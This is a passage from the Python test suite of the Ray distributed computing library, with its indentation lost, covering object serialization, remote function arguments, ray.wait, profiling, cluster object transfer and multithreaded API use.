new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start_regular):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass(object):
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
def test_ray_recursive_objects(ray_start_regular):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start_regular):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start_regular):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(ray_start_regular):
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start_regular):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(ray_start_2_cpus):
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1(object):
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2(object):
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(ray_start_regular):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.ray_start()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=2, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
assert ray.get(g._remote()) == []
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
@ray.remote
class Actor2(object):
def __init__(self):
pass
def method(self):
pass
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
a2 = Actor2._remote()
ray.get(a2.method._remote())
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(ray_start_regular):
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Wait 0.1 second for the objects to be deleted.
# 4. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
class RawActor(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
ActorOnNode0 = ray.remote(resources={"Custom0": 1})(RawActor)
ActorOnNode1 = ray.remote(resources={"Custom1": 1})(RawActor)
ActorOnNode2 = ray.remote(resources={"Custom2": 1})(RawActor)
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
# Wait for the objects to be deleted.
time.sleep(0.1)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
